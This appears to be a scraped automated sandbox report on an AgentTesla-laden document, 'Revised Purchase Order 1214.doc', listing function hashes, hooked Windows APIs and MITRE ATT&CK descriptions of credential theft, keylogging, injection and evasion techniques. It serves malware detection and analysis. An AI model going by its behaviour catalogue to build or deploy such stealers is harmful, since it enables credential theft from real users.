Instruction Fuzzy Hash: 7FC13774A04219CFCB65DB64C85479CB7BAAF88305F20C4E9D50AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00369F2E, Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 01d2ea8d6689eb001f56503445ba1678a8851031d6a3e17f1f6ce4b666e31cd6
Instruction ID: 655341e21571ea29406db6787543fc6290cde1b9986593180913e05c18920ff4
Opcode Fuzzy Hash: 01d2ea8d6689eb001f56503445ba1678a8851031d6a3e17f1f6ce4b666e31cd6
Instruction Fuzzy Hash: 8EB14774A04219CFCB25DB24C85479CB7BAAF88305F20C5E9D10AE7385DB389E82CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00369F76, Relevance: 1.8, APIs: 1, Instructions: 251COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4c91a5f87734b646034a331ce375de49108032dabe0def397583220312bf410d
Instruction ID: 84bb15959c39d779ffe80b3d342840e11c856d4080b182efe86f9ce600495da1
Opcode Fuzzy Hash: 4c91a5f87734b646034a331ce375de49108032dabe0def397583220312bf410d
Instruction Fuzzy Hash: C1B13774A04219CFCB25DB64C85479CB7BAAF88305F20C5E9D50AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00369FBE, Relevance: 1.7, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fc273a231d85c69005b565d2e25c27c519dd9febcae3e1dd32a4d978f663ca98
Instruction ID: e5f322ec8b116187b2ee5b90c044c9073d7a95668f0fb01e47f38695ff75cb3a
Opcode Fuzzy Hash: fc273a231d85c69005b565d2e25c27c519dd9febcae3e1dd32a4d978f663ca98
Instruction Fuzzy Hash: 2BB14974A04215CFCB25DB64C85479CB7BAAF88305F20C5A9D50AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0036A006, Relevance: 1.7, APIs: 1, Instructions: 237COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b66389cc5761e22c30bbf3b092efc79bf8c4f995ec52027aeba7334efafd82d7
Instruction ID: e2d3b63e41be2a2c9a8f905e54b5703590776fc536a7505e515ce541f1e674b2
Opcode Fuzzy Hash: b66389cc5761e22c30bbf3b092efc79bf8c4f995ec52027aeba7334efafd82d7
Instruction Fuzzy Hash: 91A15A74A44219CFCB65DF24C85479CB7BAAF88305F20C4A9D50AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0036A04E, Relevance: 1.7, APIs: 1, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 39702095252bc7ed780459522cbcb15b93701fb7c3a718a9950496dd25a64a33
Instruction ID: e65232b712f8ae12a72e60b5c2346c153caa46719be97d0e168e55d494f34a60
Opcode Fuzzy Hash: 39702095252bc7ed780459522cbcb15b93701fb7c3a718a9950496dd25a64a33
Instruction Fuzzy Hash: 35A15B74A00215CFCB65DF24C89479CB7BAAF88305F20C5A9D109E7355DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0036A096, Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a6a778c7ad43fc704f0d06ee4f3b3ded1359f543b402646ea1a18a63eb8f8b94
Instruction ID: 20bc892138b7ded25c249491a28c919d2d8896b26bb60959931c43bab7a9c57d
Opcode Fuzzy Hash: a6a778c7ad43fc704f0d06ee4f3b3ded1359f543b402646ea1a18a63eb8f8b94
Instruction Fuzzy Hash: 2FA15A74A442198FCB25DF24C85479CB7BAAF88305F20C5A9D10AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0036A0DE, Relevance: 1.7, APIs: 1, Instructions: 216COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6880e021fd428d5edf00c95270209b36fc1dc1382d9be36a4283a4976f80c8a3
Instruction ID: 4d97a9334418b9a3bdf76c9a32514666afb6fa9f63d09340ef32f0706ca0579b
Opcode Fuzzy Hash: 6880e021fd428d5edf00c95270209b36fc1dc1382d9be36a4283a4976f80c8a3
Instruction Fuzzy Hash: 6B915C74A442198FCB65DF24C89479CB7BAEF88305F20C5A9D109E7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0036A126, Relevance: 1.7, APIs: 1, Instructions: 209COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0036A14D

Memory Dump Source

Source File: 00000007.00000002.2394297795.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8489d3e5d3f29430cfad6b6d2a7675f5ba2b00af1db76c95e4a58aa557c2b3b1
Instruction ID: ce723e086b6804b705d2ea619ad9cba5b29112779c87ebc59f6ed278772b5ed7
Opcode Fuzzy Hash: 8489d3e5d3f29430cfad6b6d2a7675f5ba2b00af1db76c95e4a58aa557c2b3b1
Instruction Fuzzy Hash: 02916B74A442158FCB65DF24C89479CB7BAEF88305F20C5A9D10AE7385DB389E86CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00A474B8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00A47571

Memory Dump Source

Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d3d6a049bfc770caf3276f0ddba5573f61ce4caac9aa748987272452badbad7d
Instruction ID: 42b31b89d42483b230eec044d2c7b89ce38e041ca614407b82f0f602fb29cdb1
Opcode Fuzzy Hash: d3d6a049bfc770caf3276f0ddba5573f61ce4caac9aa748987272452badbad7d
Instruction Fuzzy Hash: 9931F2B5D00258DFCB20CF99D884A8EFBF5BF88310F24842AE818AB310C7709905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4FA79, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 00A4FAFB

Memory Dump Source

Source File: 00000007.00000002.2394684375.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 38cfa4bcea68d6266be47042f9ca1a7d223daa4a770eac229f48e4ec2e3bb05a
Instruction ID: eb2b3862c92a7bcb2b27912057ff5e811f54cd864a1f11c116d1d0b5a468e082
Opcode Fuzzy Hash: 38cfa4bcea68d6266be47042f9ca1a7d223daa4a770eac229f48e4ec2e3bb05a
Instruction Fuzzy Hash: 862115759002099FCB14CF99D844BEEFBF5FB89324F14882AE459A7350C774A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D48C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8d29a7d5e1e2fbaa489e17e9bc20aa449df8c48462a3870cbf620840e4c5fb
Instruction ID: d9946be2a93f09609eddf76c36f35c75af4173a67b6c287d0c37c115297a9df1
Opcode Fuzzy Hash: 4e8d29a7d5e1e2fbaa489e17e9bc20aa449df8c48462a3870cbf620840e4c5fb
Instruction Fuzzy Hash: 3121F575640244DFDB05DF50F9C4B26BFB6FB98328F24C569E8054B246C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D578, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b6cb7669d9a80e31717cc0775e39b9d343499fe504889630dece9ba943c6013
Instruction ID: 73d010ca4a8b61774703d49ecc0479d858433ada0ad6aaa79bcce570cc83ae31
Opcode Fuzzy Hash: 1b6cb7669d9a80e31717cc0775e39b9d343499fe504889630dece9ba943c6013
Instruction Fuzzy Hash: 2E2107B5504244DFDB15CF50F9C4B1ABF75FB98318F248569E8090B246C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9aecf7caece6dab14cf5b70df832d2bf2a7ee6c4dac825d9b9ff1c1b351380e
Instruction ID: 7bff19626d736e545c72e4c121963ca52ee67942c2bb8b04def682817a226191
Opcode Fuzzy Hash: f9aecf7caece6dab14cf5b70df832d2bf2a7ee6c4dac825d9b9ff1c1b351380e
Instruction Fuzzy Hash: 3721F275604204DFCF14CF60E984B16BBA5EB88314F24C9A9E8094B366C33AD847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014E674, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fa30c8d5d25e9396eced7d23a13458c47b2624957e6417e2b154f1beb077024
Instruction ID: db7c136c1cfded35e5a06ac93b00bfd2e4701278b0de130ecb78f9bdb2705b01
Opcode Fuzzy Hash: 0fa30c8d5d25e9396eced7d23a13458c47b2624957e6417e2b154f1beb077024
Instruction Fuzzy Hash: 9D210775600204EFCB04CF60D5C4B16BBE5FB98324F24C969D8094B362C336E856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93464262d722715b1cb377030a17e7f3a96675f73f9d73ee60ea154cce500f6
Instruction ID: 2f89ff7a68721151f1c51c362bef1c3747af0de5b3feeed9e8a6f3f706b20b91
Opcode Fuzzy Hash: a93464262d722715b1cb377030a17e7f3a96675f73f9d73ee60ea154cce500f6
Instruction Fuzzy Hash: A52162755083809FCB02CF14E994715BF71EB46314F28C5EAD8498F267C33AD856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0013D487, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: cbe4f710c131fc96d0e6782619637122defce7acd4f8a960d78c78714d42e7f6
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 9A11E276544280CFCF02CF10E9C4B16BF72FB94324F24C6A9D8094B216C33AD95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0013D573, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction ID: cf2d305b99e3eb2a9ab5a1fff32b97df49dade3f54be934d994472222e8a3414
Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
Instruction Fuzzy Hash: 3A11E6B6504280CFCF12CF10E9C4B16BF72FB95314F24C5A9D8090B216C336D856CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014E66F, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394144964.000000000014D000.00000040.00000001.sdmp, Offset: 0014D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction ID: dbefd6cf80a4368ee270abc75b8d7f324a25cd5686c99f1925e76425de1786d0
Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
Instruction Fuzzy Hash: EA119D79504280DFCB05CF10D5C4B15FFA2FB85324F28C6A9D8494B666C33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D795, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54f00dc04f9da8d4fdb7f3f3a8eb194158fe46bfaeeb02205a5e9be54661d59
Instruction ID: c8207fb7f74c998c75870ef36c1bcbf9533b3473b97e027b7863f902acff15df
Opcode Fuzzy Hash: f54f00dc04f9da8d4fdb7f3f3a8eb194158fe46bfaeeb02205a5e9be54661d59
Instruction Fuzzy Hash: F101A771404344DBD7208B65F988BA7BBDCEF51728F14C55AEE495B282C378AC44C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0013D794, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394113181.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107e4bae5295f04e5749343e5ccb969989084340f03a47c3a329eaade0e3436e
Instruction ID: 090a2b69b00d800fdec55bac2037b01cfe824b14e9b8e0e8a9e501e3c8180dbf
Opcode Fuzzy Hash: 107e4bae5295f04e5749343e5ccb969989084340f03a47c3a329eaade0e3436e
Instruction Fuzzy Hash: 23F01275404744ABE7208E15E888B66FFD8EF91734F28C59AED485B286C379AC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404208, Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2394346599.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2394338909.0000000000400000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77c4be4ae6bd9649bc7396ea4b2f6a21676d11070a655a7510003ee973814904
Instruction ID: 1f27e055348b1160dfcadc7b5337b4be5b2f0784eb200be0db3f906d3341f116
Opcode Fuzzy Hash: 77c4be4ae6bd9649bc7396ea4b2f6a21676d11070a655a7510003ee973814904
Instruction Fuzzy Hash: F6E1058144E7D61ECB13DBB5183AB96BF316E63214F5E95DFC0C29B093F6212829C366

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Revised Purchase Order 1214.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

SMTP Packets

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre